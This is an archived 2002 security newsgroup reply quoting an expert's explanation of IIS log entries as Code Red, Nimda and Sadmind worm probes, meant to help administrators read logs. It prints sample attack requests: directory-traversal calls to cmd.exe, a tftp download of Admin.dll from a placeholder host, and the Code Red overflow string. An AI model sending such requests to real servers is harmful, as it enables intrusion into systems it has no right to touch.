Re: Strange Log File Entries
From: George Hester (hesterloli@hotmail.com)
Date: 11/05/02
- Next message: News: "SMTP service in IIS on Win2000"
- Previous message: Alun Jones: "Re: Editing Certificate Service information"
- In reply to: Karl Levinson [x y] mvp: "Re: Strange Log File Entries"
- Next in thread: John Wood: "Re: Strange Log File Entries"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "George Hester" <hesterloli@hotmail.com> Date: Tue, 5 Nov 2002 17:21:52 -0500
Excellent. Thanks.
-- George Hester __________________________________ "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message news:uSYo7aHhCHA.2448@tkmsftngp11... > > "Jaffa" <jaffa@cakes.com> wrote in message > news:OU6Yx9GhCHA.2508@tkmsftngp08... > > Can anyone explain these entries in my log file? Is it a virus attack? I > > have no idea where they came from and why they are trying to access > cmd.exe. > > I have Win2k SP3 installed, and all the other critical updates. X.X.X.X is > > my the IP address of my IIS server. > > > > 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD > > /winnt/system32/cmd.exe 404 3 144 124 0 - - - > > 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD > > /winnt/system32/cmd.exe 404 3 144 91 0 - - - > > 2002-11-04 21:15:32 80.130.13.155 - W3SVC1 X.X.X.X HEAD > > /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500 87 0 95 0 - - - > > Yes, looks like an old worm. The codes 404 and 500 show that this was > probably not successful. > > Note that not only do you need the latest updates, but you also need to have > your web server configured correctly, per the hardening windows 2000 and IIS > checklists at www.microsoft.com/technet/security, www.nsa.gov, > http://rr.sans.org, etc. It also sounds like you have not installed > IISlockdown which includes URLScan, a very helpful tool in blocking this > stuff. > > Read below for more info on reading your IIS logs: > > ================ > > These are signs of well-known worms [the Code Red and/or Nimda worm] that > spread from server to infected server. Probably every web server on the > Internet has received and will continue to receive these "attacks," perhaps > several times a day, whether or not the servers are vulnerable to the worm, > even if firewalls and/or antivirus are being used. > > The IP address that is sending the requests to your server is likely another > infected web server and not necessarily a hacker. > > If you are seeing the log entries in the URLSCAN.LOG file, then URLScan has > successfully blocked that worm attack. [However, the existence of URLScan > does not necessarily prove that a computer is free of all viruses and worms; > for example, a computer that was infected with a worm before URLScan was > installed could still be infected.] > > The best way to tell whether your server has been infected is to install and > use an antivirus program. > > It is not necessarily always accurate to deduce from the 200, 404 and 500 / > 502 codes in a web server log whether or not the server has been infected. > For more information on this, see the section in this FAQ entitled "I found > a code 200 [or 502] in my IIS logs, does that mean my web server has been > successfully hacked?" > > For more information on these worm attacks, visit the web site of your > favorite antivirus vendor and/or visit the links below: > > www.cert.org > www.cve.mitre.org/cve > www.nipc.gov > www.eeye.com > www.microsoft.com/technet/security > > Below are samples of what an IIS web server log would look like when > attacked by a worm such as Nimda, Code Red and/or Sadmind / IIS worms: > > > NIMDA LOOKS LIKE THIS ======================= > > [Note that the system is likely compromised if you see a code 200 in the > line where the "tftp.exe" command is used to download the file "Admin.dll," > as in the last line below. Note however that the lines below containing the > "copy" and "echo" commands were also successful, despite the 502 code which > usually indicates failure.] > > GET /scripts/root.exe?/c+dir 200 - > GET /MSADC/root.exe?/c+dir 200 - > GET /c/winnt/system32/cmd.exe?/c+dir 200 - > GET /d/winnt/system32/cmd.exe?/c+dir 200 - > GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 - > GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 - > GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 - > GET > /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/sy > stem32/cmd.exe?/c+dir 200 - > GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir 200 - > GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir 200 - > GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir 200 - > GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir 200 - > GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 - > GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 - > GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 - > GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 200 - > > GET /scripts/../../winnt/system32/cmd.exe > /c+copy+\winnt\system32\cmd.exe+root.exe 502 - > GET /scripts/root.exe /c+echo+.././index.asp 502 - > > GET > /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp%20i%20x.x.x.x%20GET%20Admin. > dll%20d:\Admin.dll 200 - > > > CODE RED LOOKS LIKE THIS: ======================= > > [Note that a code 200 after the "GET /default.ida?" line in a Code Red > attack does not necessarily indicate success or failure. It means that the > .ida mapping has not been removed from the IIS server, and it probably > should be.] > > GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% > u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 > b%u53ff%u0078%u0000%u00=a > > > CODE RED II LOOKS LIKE THIS: ====================== > > [Note that a code 200 after the "GET /default.ida?" line in a Code Red > attack does not necessarily indicate success or failure. It means that the > .ida mapping has not been removed from the IIS server, and it probably > should be.] > > GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801% > u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0 > 0%u531b%u53ff%u0078%u0000%u00=a 200 - > > > SADMIND / IIS WORM LOOKS LIKE THIS: =============== > > [Note that this is what the log looks like on a successfully compromised > system - the code 502 after the "copy" and "echo" commands does not indicate > failure here, the commands were successful despite the 502.] > > GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 - > GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 - > GET /scripts/../../winnt/system32/cmd.exe > /c+copy+\winnt\system32\cmd.exe+root.exe 502 - > GET /scripts/root.exe /c+echo+.././index.asp 502 - > > [Thanks to "Gurn" and others] > ________________________________________________________ > > (11.19) I found a code 200 [or 502] in my IIS logs, does that mean my web > server has been successfully hacked? > > A: Not necessarily. Because of this uncertainty, the best way to tell > whether your server has been infected is to install and use an antivirus > program. > > Normally, a code 502 in an IIS web server log normally indicates that the > request was unsuccessful. However, in some cases, the code 502 does not > indicate failure [for example the code 502 after the "copy" and "echo" > commands used by the Sadmind / IIS Worm and Nimda]. > > Similarly, a code 200 after a line in an IIS web server log indicates that > the request was successful. However, read the post below by Paul Lynch > regarding a 200 code after a "GET /default.ida" request [as with the Code > Red worm]: > > "...a lot of confusion surrounds the 200 return code in response to the GET > /default.ida request. > > In a nutshell what this means is that if you haven't removed the .ida > mapping IIS processes the request successfully and returns a 200 to the > browser. > > What it *doesn't* mean is that the worm has successfully penetrated your > machine. A patched Index Service will still return a 200 to a browser if > the .ida mapping is present." > > A code 404 in the logs so far still appears to indicate an unsuccessful > request [or attack], due to the attacker or worm requesting a file that does > not exist on the server. > > Again, because of this uncertainty, the best way to tell whether your server > has been infected is to install and use an antivirus program. > > [Thanks to Paul Lynch] > > >
- Next message: News: "SMTP service in IIS on Win2000"
- Previous message: Alun Jones: "Re: Editing Certificate Service information"
- In reply to: Karl Levinson [x y] mvp: "Re: Strange Log File Entries"
- Next in thread: John Wood: "Re: Strange Log File Entries"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
